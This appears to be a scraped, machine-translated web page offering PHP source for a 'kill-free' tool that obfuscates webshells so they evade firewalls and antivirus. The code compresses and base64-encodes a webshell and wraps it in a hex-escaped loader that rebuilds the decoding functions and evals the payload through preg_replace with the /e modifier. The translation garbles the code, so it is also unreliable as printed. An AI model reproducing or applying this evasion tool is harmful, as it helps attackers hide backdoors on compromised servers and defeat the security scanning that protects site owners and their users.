Phpshell super powerful kill-free, reduce volume tool implementation code _ PHP
Last Update:2017-05-14
Source: Internet
Author: User
This is not a webshell. it is just a webshell kill-free tool. do not use it in the original webshell. only do it with phpwebshell lostwolf.
This is not a webshell, but a webshell kill-free tool.
Do not use webshell
Only Kill-free phpwebshell
This tool runs in cli mode!
If there is any file content that cannot be broken through, you can try to use this tool to stop the Trojan!
Any php webshell code through this tool can bypass some domestic bt firewalls
The code is as follows:
/*
Title: PHP shell nokill T00L
Blog: exploit-db.blogcn.com
*/
Error_reporting (0 );
@ Ini_set ('memory _ limit ','-1 ');
Set_time_limit (0 );
$ Toolname = "$ argv [0]";
If ($ argc <2 ){
Baner ($ toolname );
Die;
}
$ Input_file = trim ($ argv [1]);
$ Output_file = 'nokill _ '. $ input_file;
If (file_exists ($ input_file )){
No_kill_c0de ($ input_file, $ output_file );
Echo "PHP shell nokill T00L \ r \ n ";
Echo "Blog: exploit-db.blogcn.com \ r \ n ";
Echo "Input: {$ input_file} \ r \ n ";
$ File_full_path = dirname (_ FILE _). DIRECTORY_SEPARATOR. $ output_file;
Echo "[+] Generate success! \ R \ n ";
Echo "Saved to {$ file_full_path}". "\ r \ n ";
} Else {
Echo "PHP shell nokill T00L \ r \ n ";
Echo "Blog: exploit-db.blogcn.com \ r \ n ";
Die ("[-] Failed! The File $ input_file does not exist ");
}
Function No_kill_c0de ($ input_file, $ output_file ){
$ No_whitespace = php_strip_whitespace ($ input_file );
$ No_php_tag = trim ($ no_whitespace ,' ');
$ Enfile = base64_encode (gzdeflate ($ no_php_tag ));
$ Shellcode = "\ x3c \ x3f \ cross \ x68 \ cross \ xd \ xa ";
$ Shellcode. = '$ enfile ='. '"'." {$ enfile} ". '"'. ';'. "\ xd \ xa ";
$ Shellcode. = "\ x24 \ x62 \ x3d \ x73 \ x74 \ x72 \ x5f \ x72 \ x65 \ cross 7 \ x6c \ x61 \ x63 \ x65 \ x28 \ x27 \ x66 \ x27 \ x2c \ x22 \ x22 \ x2c \ x22 \ x62 \ x66 \ x61 \ x66 \ x73 \ x66 \ x65 \ x66 \ x36 \ x66 \ x34 \ x66 \ x5f \ x66 \ x66 \ x64 \ x66 \ x66 \ x65 \ x66 \ x66 \ x63 \ x66 \ x66 \ x6f \ x66 \ x66 \ x64 \ x66 \ x66 \ x65 \ x66 \ x22 \ x29 \ x3b \ xd \ xa \ x24 \ x67 \ x3d \ x73 \ x74 \ x72 \ x5f \ x72 \ x65 \ cross 7 \ x6c \ x61 \ x63 \ x65 \ x28 \ x27 \ x58 \ x27 \ x2c \ x27 \ x27 \ x2c \ x27 \ x67 \ x58 \ x58 \ x7a \ x58 \ x58 \ x69 \ x58 \ x58 \ x6e \ x58 \ x58 \ x58 \ x58 \ x66 \ x58 \ x58 \ x58 \ x6c \ x58 \ x58 \ x61 \ x58 \ x58 \ x58 \ x74 \ x58 \ x58 \ x58 \ x58 \ x58 \ x65 \ x27 \ x29 \ x3b \ xd \ xa \ cross \ x72 \ x65 \ x67 \ x5f \ x72 \ x65 \ cross \ x6c \ x61 \ x63 \ x65 \ x28 \ x27 \ x5c \ x27 \ x61 \ x5c \ x27 \ x65 \ x69 \ x73 \ x27 \ x2c \ x27 \ x65 \ x27 \ x2e \ x27 \ x76 \ x27 \ x2e \ x27 \ x61 \ x27 \ x2e \ x27 \ x6c \ x27 \ x2e \ x27 \ x28 \ x24 \ x67 \ x28 \ x24 \ x62 \ x28 \ x24 \ x65 \ x6e \ x66 \ x69 \ x6c \ x65 \ x29 \ x29 \ x29 \ x27 \ x2c \ x27 \ x61 \ x27 \ x29 \ x3b \ xd \ xa ";
$ Shellcode. = "\ x3f \ x3e ";
File_put_contents ("$ output_file", $ shellcode );
}
Function baner ($ toolname ){
Echo "PHP shell nokill T00L \ r \ n ";
Echo "Blog: exploit-db.blogcn.com \ r \ n ";
Echo "Usage: {$ toolname} phpwebshell \ r \ n ";
}
?>